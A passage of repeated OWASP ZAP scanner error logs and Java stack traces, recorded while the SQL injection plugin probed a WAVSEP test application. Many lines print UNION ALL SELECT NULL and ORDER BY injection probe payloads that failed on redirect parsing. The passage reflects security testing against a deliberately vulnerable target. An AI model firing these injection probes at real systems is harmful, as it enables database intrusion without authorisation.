org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679436 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679437 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679438 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679440 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679441 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679443 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679444 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679445 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679446 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679447 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679448 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679449 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 2155-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 2155-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 